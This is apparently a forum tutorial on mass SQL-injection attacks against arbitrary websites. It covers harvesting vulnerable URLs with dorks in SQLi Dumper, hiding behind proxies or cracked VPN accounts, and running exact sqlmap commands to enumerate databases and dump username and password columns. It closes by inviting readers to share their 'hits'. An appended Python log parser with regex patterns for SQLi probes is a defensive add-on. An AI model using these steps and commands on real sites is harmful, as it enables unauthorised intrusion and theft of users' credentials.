
1. Python 2.7 + click +
2. SQLmap + click +
3. SQLiDumper + click +
4. VPN Accounts (Check Accounts Section) (Hide My Ass works best)
5*. RDP / VPS

* not needed but helpful

_________________________________

Let's get started:


1. Create a new Folder called "DB Hacking" or something along these lines. (Why? -> Else you might lose the overview)

2. Download and install Python 2.7.XXX.

3. Download SQLiDumper 8.3 and add it into your folder.

Folder: DB Hacking
∟ SQLi Dumper 8.3

3. Download the newest sqlmap version and also add it into your folder.

Folder: DB Hacking
∟ SQLi Dumper 8.3
∟ sqlmapproject-xx

3. Go get yourself some dorks.

You don't know how?
+ click +

Or just use mine (These won't give you private DBs as other ppl can use them too)
4. Open SQLi Dumper 8.3 and paste your dorks.

(You can now choose between using HMA 2.8.24.0 or proxies.)

How to use HMA:

1. Buy / Crack a premium Acc.
2. Download HMA 2.8.24.0
3. Put in your login details and connect for the first time.

Then reconnect your VPN and click Start Scanner > URLS only in SQLi Dumper.

How to use Proxies:

Go to www.socks24.org and download the newest proxy-list.
In SQLiDumper go to Tools & Settings -> Proxy
and paste all your downloaded proxies into the SOCKS5 4 column and test them.

It will take about 20 mins to check them all.
...wait until all are checked...
Click ok.
Now from the dropdown choose the SOCKS5 4 protocol.

5. Start checking the dorks.

This process will take a while and that's why I recommend using a RDP / VPS, but you can do it on your main PC too.

After a few hrs you should have around 20k URLs and now can start checking them by canceling the Online Scanner.
So switch to the exploitables tab and click < Start Scanner >
Wait for them to be checked completely.
Now go to the next Tab "Injectables" and start this as well.
You will notice that most of the URLs are Non-Injectable (But these are what we are here for).

6. "Injecting the Non-Injectables" <- lmao sounds like a movie

Go to the Non-Injectables Tab and CTRL+A > Right click > Clipboard
Go into your sqlmap folder and create a urls.txt

Folder: DB Hacking
∟ SQLi Dumper 8.3
∟ sqlmapproject-xx
∟ urls.txt

Paste all your Non-Injectables in there.
Now Shift + Right Mouse > Open cmd/powershell here
Now for the important command:
sqlmap.py -m "urls.txt" --random-agent -f --batch -o --tables --output-dir=OUTPUT

This command will now use the newest injections available and print out all the databases which are injectable.
You can always check which sites have already been tested by taking a look into the "OUTPUT" folder.
There will be a lot of folders in the OUTPUT directory.
As some are still Non-Injectable I wrote a script to only keep the ones that are:

Download
https://www.file-upload.net/download-13433178/Cleaner.py.html

Run the file and you will be left with all folders containing a vulnerable database. Now go back into the sqlmap folder and open the cmd/powershell again.
Choose a folder from your output dir and open the target.txt
Copy the URL in there.
Now in your cmd type:
sqlmap.py -u "yoururl" --batch --dbs --output-dir=OUTPUT

This will give you a list of the DBs.
Now choose a DB which sounds like it would include the user:pass and type:
sqlmap.py -u "yoururl" --batch -D "Database Name" --tables --output-dir=OUTPUT

Now you have all tables; look for one like "users/ registration/ login..." and type:
sqlmap.py -u "yoururl" --batch -D "Database Name" -T "Tablename" --columns --output-dir=OUTPUT

If you found the information you are looking for type:
sqlmap.py -u "yoururl" --batch -D "Database Name" -T "Tablename" -C "Columns (example: username, pass)" --dump --eta --threads=5 --output-dir=OUTPUT

This will now dump the columns and give you an ETA of when they are done. Sometimes the passwords are encrypted and need to be dehashed which sqlmap does automatically. It's really fast and easy. So have fun getting your private databases and show me some hits u got below.

Don't Forget to leave a Like and +Rep if you found this helpful!
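
Seen from the server side, the scan described above arrives through rotating proxies with a random User-Agent, so per-IP and per-agent rules miss it. The following added example (not part of the original post) groups SQL-injection-looking parameter values by path and parameter instead; the log lines are constructed, and the pattern list and the `min_requests` threshold are assumptions to tune.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = '''\
198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /shop-item.php?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /shop-item.php?id=12%20AND%204821%3D4821 HTTP/1.1" 200 5120 "-" "Opera/9.80 (Windows NT 6.1)"
192.0.2.44 - - [10/Oct/2023:13:55:41 +0000] "GET /shop-item.php?id=12%27%20UNION%20ALL%20SELECT%20NULL--%20- HTTP/1.1" 500 310 "-" "Mozilla/4.0 (compatible; MSIE 7.0)"
198.51.100.23 - - [10/Oct/2023:13:55:43 +0000] "GET /shop-item.php?id=12%20AND%20SLEEP%285%29 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Macintosh)"
203.0.113.77 - - [10/Oct/2023:14:02:10 +0000] "GET /search.php?q=order+by+phone HTTP/1.1" 200 900 "-" "Mozilla/5.0 (Windows NT 10.0)"
192.0.2.8 - - [10/Oct/2023:14:05:00 +0000] "GET /art.php?content=3%20OR%201%3D1 HTTP/1.1" 200 700 "-" "Mozilla/5.0 (Android 13)"
'''

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')

# Generic SQLi test shapes (assumed starting set), matched on decoded values.
SQLI = re.compile(r"""
      \bunion\b\s+(all\s+)?select\b
    | \b(and|or)\b\s+\d+\s*=\s*\d+
    | \bsleep\s*\( | \bbenchmark\s*\( | \bwaitfor\s+delay\b
    | \binformation_schema\b
    | \border\s+by\s+\d+
    | '\s*(--|\#|or\b|and\b)
""", re.I | re.X)

def sqli_probes(log_text):
    """Map (path, parameter) -> probe count plus the distinct IPs and agents seen."""
    hits = defaultdict(lambda: {"requests": 0, "ips": set(), "agents": set()})
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target, _status, agent = m.groups()
        url = urlsplit(target)
        # parse_qsl percent-decodes, so encoded payloads are matched in clear.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if SQLI.search(value):
                rec = hits[(url.path, name)]
                rec["requests"] += 1
                rec["ips"].add(ip)
                rec["agents"].add(agent)
    return dict(hits)

def flagged(log_text, min_requests=3):
    """Parameters probed at least min_requests times, whatever the source."""
    return sorted(k for k, r in sqli_probes(log_text).items() if r["requests"] >= min_requests)

if __name__ == "__main__":
    print(flagged(SAMPLE_LOG))
```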